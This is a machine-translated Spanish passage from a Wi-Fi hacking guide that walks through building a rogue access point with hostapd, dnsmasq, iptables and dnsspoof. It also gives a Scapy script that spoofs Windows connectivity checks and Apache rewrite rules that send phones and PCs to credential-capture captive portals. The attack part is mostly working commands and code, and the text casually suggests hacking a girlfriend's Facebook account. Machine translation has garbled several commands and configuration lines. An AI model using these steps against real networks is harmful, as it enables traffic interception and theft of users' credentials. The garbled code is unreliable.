Machine Translated by Google

en la practicidad de la misma.

Hardware utilizado
• Igual que antes

• Adaptador inalámbrico TP-LINK TL-WN722N, ya que AWUS036NH no es compatible

Software utilizado:

Nombre de la herramienta Solía hacerlo

yo Crear interfaces virtuales.

Recopilación de información como AP, canal, compatibilidad con vif .

ifconfig Sube/baja la interfaz.

Asigne la dirección IP a vif.

iwconfig Ponga la tarjeta en modo monitor/administrado.

wpa_supplicant Cree archivos de configuración WPA/2.
Conéctese al punto de acceso Wi-Fi.
dhlciente Para la asignación automática de IP para la interfaz del cliente.

hostapd Para crear un punto de acceso falso.

dnsmasq para asignar IP a la víctima y manejar las solicitudes de DNS/DHCP.
aireplay-ng Para deautentificar a la víctima del AP original.

Empecemos,

134
Machine Translated by Google

Configurar punto de acceso Rogue de una sola tarjeta + punto de acceso

Elimine todos los procesos que podrían causar problemas:
1. administrador de red: ya que intenta cambiar agresivamente el modo del recién creado
interfaz y causa problemas durante pentest
2. dnsmasq: en caso de que ya se esté ejecutando 3.
dhclient: en caso de que ya se esté ejecutando con el administrador de red

servicio administrador de red detener

killall dnsmasq dhclient isc-dhcp-server

Crear interfaz virtual:

Sintaxis: iw <nombre de interfaz> interface add <nombre de vif> type <tipo de vif>
<tipo de vif> puede ser estación, __ap, monitor, tipo administrado

iw wlan0 interfaz agregar estación de tipo wlan-sta iw

wlan0 interfaz agregar wlan-ap tipo __ap

Baje la interfaz real para minimizar los problemas y active wlan-sta para escanear el aire

ifconfig wlan0 abajo

ifconfig wlan-sta arriba

Verifique el número de canal del punto de acceso al que se conectaría. En mi caso, rootsh3ll

escanear iw wlan-sta

Le mostrará una salida de novela larga que le gustaría formatear para obtener resultados específicos. Hagamos un grep
de la salida filtrada por SSID y sus números de canal correspondientes.

escaneo iw wlan-sta | grep -i “ssid\|canal principal:”

Obtendrá una salida limpia como esta:

SSID: raícesh3ll
* canal principal: 1
SSID: Airtel
* canal principal: 1
SSID: Ravinder *
canal principal: 8

Desglose de comandos:
escanear iw wlan-sta: Escanea el aire usando la interfaz wlan-sta
grep -i “ssid\|canal principal:”: cadena grep ssid y canal principal: ignorando el caso (-i).
Tenga en cuenta que el SSID en mayúscula es una cadena diferente sin el indicador -i

Tenga en cuenta el canal en el que opera rootsh3ll. Y haga cambios en su [Link]

135
Machine Translated by Google

archivo que creamos anteriormente.

Conectarse a un punto de acceso Wi-Fi

Cree un archivo de configuración, si aún no lo tiene. Sintaxis:
wpa_passphrase [ssid] [contraseña] > [Link]

wpa_contraseña rooth3ll iamrootsh3ll > [Link]

Mostrar el contenido del archivo [Link] con cat

gato [Link]

red={ ssid="rootsh3ll"
#psk="iamrootsh3ll"
psk=1f4b02fe4c82f4e0262e6097e7bad1f19283b6687f084f73331db86c62498b40
}

Conéctese a Wi-Fi usando la interfaz wlan-sta

wpa_supplicant -D nl80211 -i wlan-sta -c [Link]

Desglose de comandos:
wpa_supplicant: Utilidad utilizada para conectarse a la red WPA2
-D: Controlador a utilizar, es decir, nl80211
-i: Nombre de la interfaz

-C: Archivo de configuración

Abra una nueva terminal y solicite a rootsh3ll que asigne la dirección IP a wlan-sta

dhclient wlan-sta

Instale la interfaz wlan-ap

ifconfig wlan-ap [Link] hasta

Suponiendo que haya realizado cambios en su archivo [Link] para el número de canal actual.

136
Machine Translated by Google

Encienda el AP no autorizado

Tenga cuidado con las herramientas y la interfaz que pueden causar

problemas. servicio administrador de red detener#kill, antes
killall de que
dnsmasq impida que hostapd se inicie
dhcpd
dhlcient #Eliminar la ejecución de servidores DNS/DHCP

Ejecute hostapd
hostapd /etc/hostapd/[Link] Archivo
de configuración: [Link] Uso de la
interfaz wlan-ap con hwaddr [Link] y ssid "rsX" wlan-ap: estado de la interfaz
SIN INICIALIZAR->HABILITADO wlan-ap: AP-HABILITADO

Asigne una dirección IP de clase A ([Link]) a la interfaz wlan-ap , que se encuentra en dhcp-range en dnsmasq
ifconfig wlan-ap [Link]

Ejecute dnsmasq
dnsmasq -C [Link] -d
dnsmasq: iniciado, versión 2.76 tamaño de caché 150
dnsmasq: tiempo de compilación opciones: IPv6 GNU-getopt DBus i18n IDN DHCP DHCPv6 no-Lua TFTP
conntrack ipset auth DNSSEC loop-detect inotify dnsmasq-dhcp: DHCP , rango de IP [Link] -- [Link],
tiempo de arrendamiento 12 h dnsmasq: usando el servidor de nombres [Link]#53 dnsmasq: leyendo /etc/
[Link] dnsmasq: leyendo /etc/hosts - 5 direcciones

Desglose de comandos:
-C: Archivo de configuración
-d: Habilitar el modo de depuración

-H (opcional): Incluir hosts falsos de un archivo, falsificación de DNS

(Opcional) Habilite el acceso a Internet para la víctima

bash -c “eco '1' > /proc/sys/net/ipv4/ip_forward”

0: deshabilitar el reenvío de IPv4

1: habilitar el reenvío de IPv4

Habilitar el reenvío de iptables

como hicimos en capítulos anteriores

iptables -T nat -A POSTROUTING -O wlan-sta -j MASQUERADE iptables
-A FORWARD -I wlan-ap -j ACCEPT

Suplantar el tráfico HTTP entrante

dnsspoof -i wlan-ap Esto

completa la configuración de su AP falso con interfaces virtuales.

137
Machine Translated by Google

Advertencia "Sin acceso a Internet" REVISIÓN

Últimamente, es posible que tenga problemas con ataques AP no autorizados dirigidos. Un punto de acceso no
autorizado con un solo adaptador generalmente no tiene conexión a la WAN. Incluso si crea una interfaz virtual, hay
un cambio: no tiene una fuente de Internet activa. Por lo tanto, no hay Internet para el cliente, lo que puede causar
serias sospechas y hacer que el cliente se desconecte de su punto de acceso falso.

No se trata solo del cliente, ya sea una tableta o un teléfono móvil, los dispositivos son inteligentes hoy en día.
Mediante una simple solicitud HTTP GET , es más fácil verificar la accesibilidad a Internet. Pero, como hacker
de Wi-Fi, no quieres que tu víctima sepa esto.

¿Por qué?

La advertencia "Sin acceso a Internet" molesta a los usuarios/dispositivos, lo que hace que se desconecten.
Definitivamente no quieres perder en tu objetivo.

Sí, este es un "error" común y normal cuando se trata de este tipo de ataque y hasta ahora casi nadie le ha
prestado atención.

Para resumir, el error "Sin acceso a Internet" tuvo que ser eliminado.

138
Machine Translated by Google

Ejemplos de error "Sin acceso a Internet" en win 7/10

¿Qué está causando exactamente el error "Sin acceso a Internet"?

Antes de saltar a la teoría, observemos qué solicitudes realiza nuestra máquina de destino justo
después de conectarse al punto de acceso.
Sistema de destino: Windows 7 y Windows 10
Abrir Wireshark (como raíz):

Después de un tiempo con Wireshark, noté que después de cada conexión, hay solicitudes
de DNS para [Link] y una para el archivo [Link] .

Windows realiza una operación en segundo plano cada vez que se activa una interfaz, Microsoft
Método de indicador de estado de conectividad de red (también conocido como NCSI) que también se puede ver en el registro:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NlaSvc\Parameters\Internet

Entrada de registro en win7 basic, x86 y win10 pro, x86-64:

139
Machine Translated by Google

Como puede ver, el registro de win10 incluye todas las entradas de win7 y algunas otras, así que concentrémonos en una de
win10.

Recomendaciones:

• Direcciones ipv4 e ipv6 codificadas

• Hay solicitud de DNS a [Link]

• Windows espera una respuesta correcta a la solicitud de DNS anterior ([Link] /

[Link]), es decir, direcciones ipv4 e ipv6, respectivamente.

• Hay una solicitud [Link] de [Link]

• Windows espera el contenido correcto de [Link], es decir, Microsoft NCSI

• Con un punto de acceso no autorizado sin acceso a la WAN, todos los criterios de NCSI fallan.

Lo que debemos hacer es suplantar las respuestas a las solicitudes necesarias para cumplir con los criterios de NCSI.

Crearemos paquetes con Scapy.

Hay mucho código que no explicaré, ¿por qué? Porque es sencillo. Si tiene alguna pregunta, puede unirse/iniciar un hilo en el

foro o no dude en enviarme un correo electrónico (harry@[Link])

Después de verificar que el paquete es una solicitud de DNS, primero nos ocuparemos de los paquetes ipv4 (tipo A).

Respuesta de suplantación de identidad a la solicitud de DNS de [Link] :

Puede descargar todos los archivos desde [Link]

si 'dns' en pkt[DNS].[Link] y 'msftncsi' en pkt[DNS].[Link]:

#DEBE DEVOLVER VALOR
VERDADERO! print(' Parece que las solicitudes de DNS capturadas son
[Link]') spoofed_pkt = Ether(dst=pkt[Ether].src, src=pkt[Ether].dst, type=pkt[Ether]
.tipo)/\
IP(dst=paquete[IP].src, src=paquete[IP].dst)/\

140
Machine Translated by Google

UDP (dport = paquete [UDP] .sport, sport = paquete [UDP] .dport) / \ DNS
(id = paquete [DNS] .id, qr = 1, aa = 1, qd = paquete [DNS] .qd, \ an =
DNSRR (rrname = pkt [DNS] .[Link], ttl = 64, rdata = '[Link]')) del pkt [IP] .chksum del
pkt [UDP] .chksum

sendp(spoofed_pkt,iface='at0') print('Envío
de respuesta falsificada:') spoofed_pkt.show2()

Ahora Windows no tiene definida la dirección [Link]/ [Link] , por lo que podemos alojarla fácilmente en
nuestro servidor apache y falsificar la solicitud de DNS para [Link] a la máquina atacante con
[Link] o dnsspoof de dnsmasq

rdata='[Link]' representa la IP 'wlan-ap', como se establece en el punto de acceso no autorizado)

si 'www' en pkt[DNS].[Link] y 'msftncsi' en pkt[DNS].[Link]: #DEBE SEÑALAR AL

SERVIDOR CON [Link]; print(' Aparece una solicitud de DNS capturada
[Link]') spoofed_pkt = Ether(dst=pkt[Ether].src, src=pkt[Ether].dst, type=pkt[Ether]

.tipo)/\
IP (dst = pkt [IP] .src, src = pkt [IP] .dst) / \ UDP (dport =
pkt [UDP] .sport, sport = pkt [UDP] .dport) / \ DNS (id = pkt [ DNS] .id, qr
= 1, aa = 1, qd = pkt [DNS] .qd, \ # [Link] debe estar sintonizado con
GW para dhcp an = DNSRR (rrname = pkt [DNS] .[Link], ttl = 64,
rdata = '10 .0.0.254 ')) del paquete [IP] .chksum del paquete [UDP] .chksum

sendp(spoofed_pkt,iface='at0') print('Envío
de respuesta falsificada:') spoofed_pkt.show2()

Ahora, ocupémonos de los paquetes ipv6 (tipo AAAA).

Respuesta de suplantación de identidad a [Link]:

si 'dns' en pkt[DNS].[Link] y 'msftncsi' en pkt[DNS].[Link]: #DEBE DEVOLVER EL VALOR

VERDADERO
print(' Solicitud DNS AAAA para [Link] encontrada, el bucle funciona') spoofed_pkt
= Ether(dst=pkt[Ether].src, src=pkt[Ether].dst, type=pkt[Ether]
.tipo)/\
IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\ DNS(id=pkt[ DNS].id,
qr=1, aa=1, qd=pkt[DNS].qd,\ an=DNSRR(rrname=pkt[DNS].[Link],
type=28, ttl=64, rdata='fd3e :4f5a:5b81::
1'))
del paquete [IP] .chksum
del paquete [UDP] .chksum

sendp(spoofed_pkt,iface='at0') print('Envío
de respuesta falsificada:') spoofed_pkt.show2()

De nuevo, falsificamos [Link] Solicitudes de DNS a la dirección wlan-ap ipv6, ya que

Windows no tiene una dirección especificada y alojaremos [Link] en apache, como se indicó anteriormente:

141
Machine Translated by Google

si 'dns' no está en pkt[DNS].[Link] y 'msftncsi' en pkt[DNS].[Link]:

#DEBE DEVOLVER VALOR VERDADERO

print(' Solicitud DNS AAAA para [Link] encontrada, el bucle funciona')

spoofed_pkt = Ether(dst=pkt[Ether].src, src=pkt[Ether].dst, type=pkt[Ether]
.tipo)/\
IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
DNS(id=pkt[ DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\
an=DNSRR(rrname=pkt[DNS].[Link], type=28, ttl=64, rdata='fe80 ::ea94:f6ff:
fe24:d147'))
#RDATA JE IPV6 OD wlan-ap
del pkt [IP] .chksum del pkt
[UDP] .chksum sendp
(spoofed_pkt, iface = 'at0') print
('Respuesta falsificada enviar:')
spoofed_pkt.show2 ()

No olvidemos crear el archivo [Link]

Cree un archivo .txt con contenido "Microsoft NCSI" (sin comillas) en el directorio raíz de apache (var/www/
html)

Ahora, enciende todo airmon-

ng check kill airmon-ng start
wlan0 airbase-ng –essid <TU
ESSID AQUÍ> wlan0mon

Abrir nueva terminal:

ifconfig at0 up #podría ser wlan0/wlan0-ap si usa interfaces virtuales o hostapd

python [Link]
Ejecutado desde /root/Desktop

Asumiendo la interfaz en 0
Buscando...

NOTA: Este script está escrito para at0, si está usando hostapd como su software de punto de acceso con wlan0,
use [Link].
Si usa interfaces virtuales, simplemente busque y reemplace todo at0 con wlan-ap (o el nombre de su interfaz AP) en
[Link]. Funcionará bien. No olvide activar la interfaz antes de ejecutar [Link].

¿Resultados?

Como puede ver en las imágenes a continuación, después de colocar [Link] en el lugar correcto y ejecutar nuestro
script, ya no hay más errores de "Sin acceso a Internet":

142
Machine Translated by Google

En planes…

Se puede hacer lo mismo para MAC y otros iDevices, que usan el mismo protocolo. Algunos Mac e iDevices se
desconectan de los AP sin conexión a WAN, por lo que sería útil.
Hackear información de un iDevice es simplemente dulce. Lo haré tarde o temprano ;)

143
Machine Translated by Google

8
Portales cautivos

En teoria
¿Alguna vez se preguntó cómo su dispositivo sabe mágicamente sobre la disponibilidad de la conexión a Internet?
¿Cómo sabe que necesita iniciar sesión en el navegador para acceder a Internet? ¿Cómo sabe siquiera la
dirección donde se encuentra el formulario de inicio de sesión?

Bueno, si está observando todos estos comportamientos con la lente de un hacker, probablemente tendrá
una pequeña idea de lo que está sucediendo o su mente podría comenzar a dar vueltas cuando vea lo fácil
que es preparar su honeypot y ver las abejas. (víctimas)
ellos mismos dándote toda la miel (creds!). Esto se llama Portal Cautivo.

Un portal cautivo es cuando, después de conectarse a Wi-Fi, cualquier solicitud web que realice se redirige
a una página de inicio de sesión/ToS. Para continuar, debe iniciar sesión con un nombre de usuario/
contraseña (o registrarse y luego iniciar sesión) y/o acceder a los Términos de servicio.

144
Machine Translated by Google

Introducción

Cada vez que vaya a Starbucks, aborde un tren de metro o su plan de Internet caduca. Inmediatamente después de conectar Wi-

Fi en su dispositivo móvil, debe haber notado que apareció una pantalla de inicio justo sobre su pantalla, pidiéndole que inicie

sesión.

Algo como esto:

Entonces, ¿cómo se vuelve tan inteligente el

sistema?

Si nunca se ha conectado a un punto de

acceso Wi-Fi público donde se ve obligado a

iniciar sesión después de conectarse, esto es

lo que es un portal cautivo de Wi-Fi.

Con esta característica, los clientes de Wi-

Fi (portátiles, tabletas, etc.) pueden iniciar

sesión en su Smart

cuenta de lanzamiento. De esta manera ellos

puede administrar y/o facturar Wi-Fi

usuarios

Estrategia básica detrás de la detección de portal cautivo

El mecanismo de Detección Automática de Portal Cautivo se basa en una simple verificación, realizada por el Sistema

Operativo (SO) del dispositivo cliente (teléfono inteligente, tableta, computadora portátil).

Simplemente intenta llegar a una URL específica y verificar que dicha URL devuelve un resultado conocido.

Todos los sistemas operativos móviles simplemente revisan una página web para decidir si están detrás de un portal cautivo o
no.

145
Machine Translated by Google

El mecanismo es este:
OBTENER/POST [Link]
Si [Link] == [contenido esperado] > Abrir Internet
Si [Link] != [contenido esperado] > Portal cautivo
Si [Link][estado] != ÉXITO > Sin red

Si no hay un portal cautivo, el resultado coincidirá con el esperado y el sistema operativo sabrá que hay
acceso total a Internet.

Si la URL devuelve un resultado diferente al esperado, entonces el sistema operativo detectará que existe un
portal cautivo y que es necesario continuar con la autenticación para obtener acceso completo a Internet: en
este caso, el sistema operativo abrirá el Página de bienvenida automáticamente.

Diferencias entre dispositivos cliente

Todos los dispositivos cliente utilizan la estrategia descrita anteriormente para averiguar si están detrás de
un portal cautivo, pero la URL puede variar según el modelo específico de teléfono inteligente, tableta,
computadora portátil y según la versión específica del sistema operativo. A continuación puede encontrar la
lista de dominios que son contactados por cada modelo para detectar el portal cautivo.

Método de detección de portal cautivo por varios sistemas operativos

androide 4, 5, 6
• [Link]
• Verificación de [Link]
• [Link]

146
Machine Translated by Google

ventanas

• [Link]
• [Link]

Microsoft usa direcciones IPv4 e ipv6 codificadas para hacer coincidir la respuesta de la solicitud para verificar la
conexión a Internet. Aunque se puede falsificar por disponibilidad o no disponibilidad con bastante facilidad.

Apple iOS 7, 8, 9 y versiones recientes de MacOS

• [Link]/[Link]
• [Link]/test/[Link]

La solicitud secreta "wispr" de Apple

WISPr (pronunciado "susurro") o roaming del proveedor de servicios de Internet inalámbrico utilizado por cada
Dispositivo Apple para detección de portales cautivos. Esta tecnología permite a los usuarios moverse entre
proveedores de servicios de internet inalámbrico de una manera similar a la que permite a los usuarios de teléfonos
celulares moverse entre operadores.

Otra pregunta es si se trata de un vector de ataque. La respuesta es probablemente si". Hay más en la funcionalidad
que una simple solicitud HTTP. Si busca la palabra clave "wispr" en la cadena User-Agent en los registros de apache,
descubrirá por qué.

La idea es que los portales Wi-Fi inteligentes detecten que se trata de un dispositivo compatible con WISPr y envíen
un mensaje WISPr en XML. Esto permite que los iDevice(s) inicien sesión con las credenciales almacenadas en
caché a través de otro mensaje XML. Esto significa, por ejemplo, que podría obtener las credenciales de alguien con
un punto de acceso Wi-Fi configurado correctamente.

Cuando un iDevice se conecta a una red Wi-Fi, lo primero que hace es realizar una solicitud a la URL [Link]
o [Link]/ test/ [Link].

Con iOS 7 en adelante, Apple comenzó a usar el agente de usuario "CaptiveNetworkSupport", aunque no es tan
común como el método de URL que usan Android y Windows.

La razón por la que Apple hace esto es porque puede estar usando una aplicación que no sea el navegador web.
Por ejemplo, lo único que podría estar haciendo es sincronizar su correo electrónico. En tales situaciones, la redirección
automática no funcionaría, ya que no hay ningún navegador en uso y nunca vería el portal.

147
Machine Translated by Google

página, y su aplicación fallará misteriosamente al conectarse a Internet.

Por lo tanto, antes de que su aplicación tenga la oportunidad de acceder a la red, Apple lo hace por
usted. Envía una solicitud a la URL anterior. Si la solicitud se redirige, entonces Apple sabe que hay
un portal. Luego abre un cuadro de diálogo, que contiene Safari, para darle la oportunidad de iniciar
sesión.

Al leer los registros de apache (/ var/ logs/ apache2/ [Link]) para dispositivos Apple, verá algo
como esto:

[Link] - - [08/May/[Link] +0530] "GET /[Link] HTTP/1.0" 302 487 "-"

"CaptiveNetworkSupport-346.50.1 wispr"
[Link] - - [08/May/[Link] +0530] "OBTENER/HTTP/1.0" 200 2004 "-"
"CaptiveNetworkSupport-346.50.1 wispr"

148
Machine Translated by Google

en el mundo real
A partir de aquí, las posibilidades de post-explotación con un portal cautivo activo son ilimitadas.
Exploraremos algunos de ellos en el próximo capítulo.

Mod_rewrite de Apache ofrece una potente funcionalidad que podemos aprovechar para fortalecer nuestras campañas de
phishing. mod_rewrite procesa solicitudes y atiende recursos según un conjunto de reglas configurado en el archivo de
configuración del servidor o un archivo htaccess ubicado en el directorio web deseado. Para obtener valor de los usuarios
móviles que hacen clic en enlaces de phishing, podemos redirigir a esos usuarios a un sitio web malicioso compatible con
dispositivos móviles, como una captura de credenciales.

¿Quieres hackear la cuenta de Facebook de tu novia? ¡Esta es tu oportunidad!

¿Qué es mod_rewrite?
mod_rewrite es un módulo de apache que proporciona un motor de reescritura basado en reglas para manipular las URL
solicitadas sobre la marcha. Las URL entrantes se comparan con una serie de reglas. Las reglas contienen una expresión
regular para detectar un patrón particular. Si el patrón se encuentra en la URL y se cumplen las condiciones adecuadas, el
patrón se reemplaza con una acción o cadena de sustitución proporcionada. Este proceso continúa hasta que no quedan
más reglas o se le indica explícitamente que se detenga.

Esto se resume en estos tres puntos:

1. Hay una lista de reglas que se procesan en orden.
2. Si una regla coincide, comprueba las condiciones de esa regla.

3. Si todo va bien, hace una sustitución o acción.

Ventajas de mod_rewrite
Hay algunas ventajas obvias al usar una herramienta de reescritura de URL como esta, pero hay otras que pueden no
ser tan obvias.
mod_rewrite se usa más comúnmente para transformar URL crípticas y feas en lo que se conoce como URL "amigables" o
"limpias".

mod_rewrite Conceptos básicos

El módulo mod_rewrite es un motor de reescritura basado en reglas que permite a los administradores web
reescribir las URL a medida que se solicitan. Las reglas se evalúan de arriba hacia abajo y generalmente tienen
puntos de interrupción establecidos en todo momento. La escritura de reglas es un poco complicada al principio, al menos
lo fue para mí, por lo que para cada ejemplo en esta publicación, proporcionaré una explicación sobre lo que hace cada
regla 'en inglés'.

149
Machine Translated by Google

Definición de reglas

Las reglas se pueden configurar en el archivo de configuración de apache (ruta predeterminada de Debian de /

etc/apache2/[Link]) o en archivos .htaccess dentro de los directorios web. Ambos métodos son generalmente similares,

con algunas excepciones distintas:

• Los archivos .htaccess evalúan las reglas según el directorio en el que residen (a menos que un

RewriteBase está configurado)

• Las reglas .htaccess se aplican a los subdirectorios, a menos que otro archivo .htaccess las anule

• Las reglas de .htaccess se pueden modificar sobre la marcha. Las reglas de configuración de apache requieren que apache2 sea

reiniciar antes de que surtan efecto

• Las reglas de RewriteMap deben configurarse en un archivo .htaccess

Variables del servidor

Las variables del servidor son útiles para escribir conjuntos de reglas complejas de mod_rewrite. Los siguientes están

disponibles dentro de mod_rewrite.

Petición Encabezados HTTP Misceláneas

%{REMOTE_ADDR} %{RAIZ DEL DOCUMENTO} %{API_VERSIÓN}

%{QUERY_STRING} %{HTTP_HOST} %{LA SOLICITUD}

%{REMOTE_IDENT} %{HTTP_USER_AGENT} %{REQUEST_URI}

Sintaxis de la regla

Las reglas de mod_rewrite pueden ser difíciles de entender al principio. Hay muchas variables, expresiones regulares y

especificidades para diferentes sintaxis. Las solicitudes se componen de algunos componentes clave a los que se hace

referencia en las reglas con variables de servidor:

[Link]
http:// %{HTTP_HOST} / %{REQUEST_URI} ? %{QUERY_STRING}

Aquí hay un ejemplo simple de una regla con su descripción 'en inglés simple' a continuación:

RewriteCond %{REQUEST_URI} ^redirigir [NC]

Regla de reescritura ^.*$ [Link] [I,D=302]

Si el URI de la solicitud comienza con 'redirect' (ignorando mayúsculas y minúsculas),

reescriba la solicitud completa en [Link] y elimine cualquier cadena de consulta de la solicitud original.

Esta es una redirección temporal y la última regla que debe evaluarse/aplicarse a la solicitud.

Como puede ver, el conjunto de reglas contendrá una expresión condicional (RewriteCond) que, si es verdadera, realizará la

próxima RewriteRule. De forma predeterminada, el servidor evaluará varias cadenas RewriteCond como AND . Si desea que

las reglas se evalúen como OR, coloque un

150
Machine Translated by Google

[O] indicador al final de la línea RewriteCond. (La combinación de banderas se realiza con una coma - [NC, OR]).

Es importante tener en cuenta que cuando se analizan las reglas, se ejecuta la primera regla coincidente, similar a
las reglas de firewall. Asegúrese de colocar reglas más específicas más arriba en la lista.

Redirección de agente de usuario

La redirección de agente de usuario nos permite obtener más valor de los objetivos de phishing que utilizan dispositivos
móviles, redirigir los navegadores que tienen errores o son incompatibles con una carga útil elegida y combatir los
respondedores de incidentes. En el siguiente ejemplo, el usuario visita la misma URL con un agente de usuario estándar de
Firefox y recibe una carga útil diseñada para estaciones de trabajo. Si el usuario busca la URL con un agente de usuario móvil,
como iPhone 3.0, se realiza una captura de credenciales.

Este conjunto de reglas coincidirá con cualquier usuario cuyo agente de usuario del navegador coincida con la expresión
regular de los navegadores móviles comunes y envíe la solicitud original al perfilador móvil codificado alojado en nuestro
servidor maligno. Todas las demás solicitudes se envían tal como están a nuestro servidor malvado.
Para reiterar un punto mencionado anteriormente, esto significa que los usuarios finales no verán la IP real de nuestro servidor
malvado, solo la que pertenece al servidor Apache.

Motor de reescritura encendido

RewriteCond %{HTTP_USER_AGENT} "android|blackberry|ipad|iphone|ipod" [NC]
RewriteRule ^.*$ [Link] [P]
Regla de reescritura ^.*$ [Link] [P]

Desglose del conjunto de reglas:

Habilitar el motor de reescritura

Si el agente de usuario de la solicitud coincide con alguna de las palabras clave proporcionadas, ignorando mayúsculas y minúsculas:

Cambie toda la solicitud para servir 'MOBILE-PROFILER-PATH' desde la IP del atacante y mantenga la misma barra de
direcciones del usuario (oculte la IP del atacante ).
Si no se cumple la condición anterior, cambie toda la solicitud para servir la ruta de solicitud original desde la IP del
servidor maligno y mantenga la barra de direcciones del usuario igual (oculte la IP del servidor maligno ).

151
Machine Translated by Google

Configurar apache para mod_rewrite

Abra el archivo de configuración predeterminado
de apache: vi /etc/apache2/sites-enabled/[Link]
<Host virtual *: 80>
Administrador del servidor webmaster@hostlocal

Raíz del documento /var/www/html/

ErrorLog ${APACHE_LOG_DIR}/[Link]
CustomLog ${APACHE_LOG_DIR}/[Link] combinado </
VirtualHost>

Sin líneas comentadas, debería verse similar al bloque de arriba.

Configuración del portal cautivo para dispositivos Apple

Cree un directorio para dispositivos Apple en el directorio de trabajo de Apache

cd /var/www/html/android mkdir apple

Copie el archivo como [Link] para crear una regla de redirección para iDevices.

cp /etc/apache2/sites-enabled/000-default /etc/apache2/sites-enabled/[Link]
<Host virtual *: 80>
ServerAdmin webmaster@localhost
ServerName [Link]
DocumentRoot /var/www/html/apple

RewriteEngine en
RewriteCond %{HTTP_USER_AGENT} ^CaptiveNetworkSupport(.*)$ [NC]
Regla de reescritura ^(.*)$ [Link] [L,R=302]

ErrorLog ${APACHE_LOG_DIR}/[Link]
CustomLog ${APACHE_LOG_DIR}/[Link] combinados
/HostVirtual>

Configuración del portal cautivo para dispositivos Android

Crear un directorio para android en apache

cd /var/www/html/android mkdir
android

Copie el archivo como [Link] para crear una regla de redirección para dispositivos Android.

<Host virtual *: 80>

Administrador del servidor webmaster@ hostlocal

ServerAlias [Link]
ServerAlias [Link] ServerAlias
[Link] ServerAlias
[Link]

152
Machine Translated by Google

ServerAlias [Link]
ServerAlias [Link] ServerAlias
[Link]

Motor de reescritura en
Regla de reescritura ^/ generar_204 $ / generar_204 [R=204,L]

RewriteCond %{HTTP_HOST} ^[Link]$ [O]

RewriteCond %{HTTP_HOST} ^[Link]$
RewriteCond %{HTTP_HOST} ^[Link]$ [O]
RewriteCond %{HTTP_HOST} ^[Link].x$

RewriteCond %{HTTP_HOST} ^[Link]$ [NC]

Regla de reescritura ^(.*)$ [Link] [L,R=302]

RewriteCond %{HTTP_HOST} ^[Link]$ [NC]

Regla de reescritura ^(.*)$ [Link] [L,R=302]

DocumentRoot /var/www/html/android
<Directorio />
Opciones FollowSymLinks
AllowOverride Ninguno
</Directorio>

ErrorLog ${APACHE_LOG_DIR}/[Link]
CustomLog ${APACHE_LOG_DIR}/[Link] combinados

</HostVirtual>

Desglose de parámetros:
FollowSymLinks: si un directorio es un enlace simbólico (acceso directo), siga el enlace
AllowOverride: All para permitir que .htaccess anule la configuración predeterminada del servidor, none para rechazar Índices:
un directorio se puede mostrar como una lista si no hay una página de índice.

Para dispositivos Android, debe crear un archivo negro (generate_204) en el directorio de Android de
Apache

cd /var/www/html/android toque
generar_204

Configuración del portal cautivo para Windows

RedirectMatch 302 /[Link] http: //portal [Link] RewriteEngine
en RewriteRule ^ /[Link] $ /[Link] [R = 302, L]

Para dispositivos Android, deberá crear un archivo negro ([Link]) en el directorio de trabajo de apache
con el texto "Microsoft NCSI". Eso es lo que esperan los dispositivos Windows

cd /var/www/html/
echo “Microsoft NCSI” > [Link]

153
Machine Translated by Google

Configurar iptables para la redirección

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE

iptables --agregar ADELANTE --en la interfaz at0 -j ACEPTAR
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination [Link]:80
iptables -t nat -A POSTROUTING -j MASQUERADE

Cambie su interfaz de entrada y su interfaz de salida en consecuencia.

Habilitar módulos:

a2enmod apple android windows #Habilita módulos

servicio apache recargar

Ahora redirija cada solicitud a su dirección IP (del atacante):

dnsspoof -i wlan0
Tenga en cuenta las solicitudes en esta ventana tan pronto como un cliente se conecte. Verá los dominios que el
dispositivo intenta contactar. Para verificar la solicitud que se envía al servidor, acceda a los registros de apache

Nosotros /var/logs/apache2/[Link]

Encienda su punto de acceso falso y ahora está listo para probar su entorno. Pruebe y cree conciencia dentro de
su oficina, escuela, universidad donde sea que pueda.

Protección contra este ataque

Si es un administrador de sistemas, no use un portal cautivo. Usa Radius o algo similar. Si es un usuario y se ve
obligado a usarlo, verifique siempre si es https (es casi imposible falsificar un sitio web https sin el certificado), o
simplemente inserte primero una contraseña falsa. Si dice 'contraseña incorrecta', entonces puede confiar en ella
(aunque es bastante fácil para el hacker enviar las credenciales de su cuenta para verificar su validez).

154
Machine Translated by Google

9
AP falso definitivo

Visión de conjunto

Si practica, en esta etapa ahora debe ser capaz de configurar un punto de acceso no autorizado y configurar
la configuración de apache en consecuencia para engañar a las víctimas en su vector de ataque.

En este escenario, estamos usando un adaptador inalámbrico y una conexión ethernet (bajo VM)
para acceso a Internet opcional. También puede ejecutar este ataque perfectamente usando
interfaces virtuales sin problemas. Solo asegúrese de usar las interfaces apropiadamente.

Herramientas utilizadas:

• hostapd o airbase-ng
• dnsmasq o servidor isc-dhcp •
apache2
• editor de texto vi o nano
• agarre
• Salsa secreta

De todas las opciones anteriores, elijo las anteriores para configurar el escenario de ataque. También
puede elegir los últimos, dependiendo de su comodidad con las herramientas.

155
Machine Translated by Google

Configurar punto de acceso

Paso 1: elimine los procesos problemáticos

sudo killall administrador de red dnsmasq wpa_supplicant dhcpd

Inicie hostapd con su archivo de configuración.

Sintaxis: hostapd /ruta/a/configuración/[Link]

cd ~ / Escritorio / fakeap /
hostapd [Link]

Ahora que tiene hostapd funcionando, necesitamos ejecutar un servidor dhcp que asignará

Direcciones IP a los clientes (víctimas)

Paso 2: Inicie el servidor dhcp

Ejecute dnsmasq con el archivo de configuración en modo de depuración

Sintaxis: dnsmasq -C /ruta/a/configuración/[Link] -d

dnsmasq -C [Link] -d

Si desea que el ataque se dirija hacia un sitio web o un cliente específico, también puede incluir [Link] para la

suplantación de dns pasado junto con la bandera -H

dnsmasq -C [Link] -H hosts [Link] -d

Paso 3: configurar el servidor web apache2

El motor de reescritura de Apache nos permite manipular solicitudes web sobre la marcha. Usando esta técnica,

podemos hacer un montón de cosas con nuestra víctima.

